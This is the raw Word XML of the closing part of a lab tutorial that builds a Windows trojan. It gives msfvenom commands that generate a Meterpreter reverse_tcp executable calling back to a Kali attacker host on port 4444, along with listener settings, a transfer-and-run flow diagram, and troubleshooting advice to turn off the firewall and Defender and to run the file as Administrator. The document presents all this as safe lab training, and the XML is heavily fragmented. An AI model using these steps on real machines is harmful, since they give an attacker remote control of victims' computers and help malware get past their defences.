    <w:p w14:paraId="0E76DA30" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Catch with listener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(same as before, but change payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009D1AD0" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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261A59F5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set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payload linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9CEEA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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983D438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71712508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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6A90E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40B04F62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Quick Reference: Complete Test Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E23F83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`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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AB676B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┌─────────────────┐         ┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB641C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KALI LINUX    │         │   WINDOWS VM    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C8A46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(Attacker)     │         │   (Victim)      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C15BE5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│         │                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEF506F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.100.10  │         │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.100.20  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ED9010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└────────┬────────┘         └────────┬────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC7234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│                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72761E2A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 Create trojan.exe             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387012F7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│                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94622D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. Start listener </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177F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:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>◄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──────────────┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D872705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│                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F0E062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 Transfer trojan ─────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0016177F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:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>►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47DCC2DA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│                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C0852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│             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4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 Run trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63483DE7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│                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657BBA88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. Receive connection </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177F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:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>◄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──────────┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFD7A9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│                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F14995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6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 Meterpreter control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!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────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0016177F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:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>►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6DA0B523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│                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49520204" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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ABEFC8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A24287F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Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08327033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Problem: "Connection refused" or no session opens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120702C3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 these:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3201A917" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Firewall: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Windows Firewall blocking? Try disabling it temporarily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C09E51" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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IP addresses: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 sure LHOST matches Kali's IP exactly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C863D6C" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Network: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they ping each other?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF5AAE" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Listener: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it running BEFORE you execute trojan?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D76CE8F" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Port: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4444 already in use? Try 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DEF579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Problem: "Payload failed to execute"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C25A3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Try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC894C" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Right-click trojan → Run as Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC1374" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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sure Windows Defender is OFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB34A17" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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architecture: Use x64 payload for 64-bit Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E456D" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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5B2A1DD2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msfvenom -p windows/x64/meterpreter/reverse_tcp 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LHOST=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.100.10 </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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LPORT=</w:t>
      </w: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4444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-f exe -o trojan64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C6D61B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update listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10BB53" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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08EF4030" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016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16177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set</w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7E2D87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Problem: "Session dies immediately"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA587CF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Cause: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Windows Defender killing it after execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0557DC08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1617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 sure ALL Defender protections are OFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0CB7E" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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BEB1AF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1AB572C" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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866"/>
        <w:gridCol w:w="2741"/>
      </w:tblGrid>
      <w:tr w:rsidR="0016177F" w:rsidRPr="0016177F" w14:paraId="469AA6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C07E2" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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B0714DC" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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On Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B818C3" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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On Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016177F" w:rsidRPr="0016177F" w14:paraId="7A47C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C259B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6B8885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trojan with msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B612EA9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16177F" w:rsidRPr="0016177F" w14:paraId="3F2C1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89E78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B42867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 python web server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="697EC3D8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16177F" w:rsidRPr="0016177F" w14:paraId="06CB5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68945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2CCD98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 Metasploit listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD81C88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16177F" w:rsidRPr="0016177F" w14:paraId="0BEFB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BC0B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F4CC95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C59611E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Download trojan from Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016177F" w:rsidRPr="0016177F" w14:paraId="33A2A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188E3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3D1BF9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B66D913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Disable Windows Defender</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016177F" w:rsidRPr="0016177F" w14:paraId="5CA83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98891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168C2E5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B09A915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 trojan.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016177F" w:rsidRPr="0016177F" w14:paraId="24121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99A66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D351DF6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Receive Meterpreter session!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19CB3738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16177F" w:rsidRPr="0016177F" w14:paraId="2AC3F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749B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384C4D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commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73D418AF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16177F" w:rsidRPr="0016177F" w14:paraId="66687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92AD5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6DD07BF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Clean up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="687EE01C" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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17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Restore snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5060511D" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704" w:rsidP="00161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1470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5755D1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A149F01" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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17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That's it! You now know how to test trojans in a safe lab environment! </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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🎉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25875CD8" w14:textId="77777777" w:rsidR="00676A80" w:rsidRDefault="00676A80"/>
    <w:sectPr w:rsidR="00676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FDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4C2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E3742"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="422A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65349"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A48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F456E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98E0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EC273D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0578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00CE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4DE8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E486D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="951A9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F3183"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59B8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FA70CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEEC9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A3751B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D05E4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7E2563"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F66E97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FF103B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B210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79207F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A11E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267B6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE1AF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0E7D54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BDC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124151"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E222BD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F12729"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="286E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537455">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="814565031">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="675419344">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="3483704">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="16197677">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="282077391">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1277758316">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2019690558">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1459644459">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1278680254">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="387531570">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1469056901">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="627316685">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1298687772">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2041196329">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1289433745">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="15283743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77F"/>
    <w:rsid w:val="00114704"/>
    <w:rsid w:val="0016177F"/>
    <w:rsid w:val="002F5AD6"/>
    <w:rsid w:val="00511F28"/>
    <w:rsid w:val="00676A80"/>
    <w:rsid w:val="007655D5"/>
    <w:rsid w:val="009A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98BE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{236F8775-A3D6-154B-ADC8-8F15D4ABB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1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1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1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1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1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1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77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61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177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6177F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-normal">
    <w:name w:val="whitespace-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00161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6177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61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6177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161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crosoft.com/software-download/windows10ISO" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.microsoft.com/en-us/windows/downloads/virtual-machin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1130</Words>
  <Characters>6441</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>53</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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Hafiz Adnan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hussain Hafiz Adnan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T07:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T07:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>